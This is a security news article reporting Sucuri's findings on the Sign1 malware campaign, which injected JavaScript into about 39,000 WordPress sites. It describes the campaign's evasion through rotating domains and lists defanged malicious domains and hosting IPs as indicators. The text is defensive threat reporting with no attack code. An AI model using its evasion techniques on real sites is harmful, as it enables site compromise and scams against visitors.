Security researchers at Sucuri have uncovered a malware campaign targeting WordPress websites. The Sign1 malware, known for its code injection techniques, has reportedly infected a staggering 39,000 sites.

Once the threat actors gain access, they use WordPress custom HTML widgets or, more commonly, install the legitimate Simple Custom CSS and JS plugin to inject the malicious JavaScript code.

Sucuri’s analysis of Sign1 shows that the malware uses time-based randomization to generate dynamic URLs that change every 10 minutes to evade blocks. The domains are registered shortly before they are used in attacks, so they’re not in any blocklists.

These URLs are used to fetch further malicious scripts that are run in a visitor’s browser. 

Initially, the domains were hosted on Namecheap, but the attackers have now moved to HETZNER for hosting and Cloudflare for IP address obfuscation.

Buy Me A Coffee
DomainRegistration DatePublicWWW Detections
js.abc-cdn[.]online2023-07-311873 sites
spf.js-min[.]site2023-09-07581 sites
cdn.jsdevlvr[.]info2023-09-18245 sites
cdn.wt-api[.]top2023-09-22316 sites
load.365analytics[.]xyz2023-10-172790 sites
stat.counter247[.]live2023-10-181089 sites
js.opttracker[.]online2023-10-191485 + 3667 sites
l.js-assets[.]cloud2023-10-254445 sites
api.localadswidget[.]com2023-11-241229 sites
page.24supportkit[.]com2023-12-052163 sites
streaming.jsonmediapacks[.]com2023-12-291291 sites
js.schema-forms[.]org2024-01-18N/A
stylesheet.webstaticcdn[.]com2024-02-05N/A
assets.watchasync[.]com2024-02-22N/A
tags.stickloader[.]info2024-03-06N/A

Initially, the domains were hosted on the Namecheap 162.0.228.112 server. Then attackers started using a server on the HETZNER network (5.75.230.95, 95.217.217.254, 128.140.70.175) and began using Cloudflare to hide the server location.

The script then redirects the visitor to scam sites, such as fake captchas, that try to trick you into enabling browser notifications. These notifications deliver unwanted advertisements directly to your operating system desktop.

READ
Microsoft Alerts on China-Based Quad7 Botnet Targeting SOHO Routers for Credential Theft

Sucuri warns that Sign1 has evolved over the past six months, with infections spiking when a new version of the malware is released.

In the past six months, Sucuri’s scanners detected the malware on over 39,000 websites, while the latest attack wave, which has been underway since January 2024, has claimed 2,500 sites.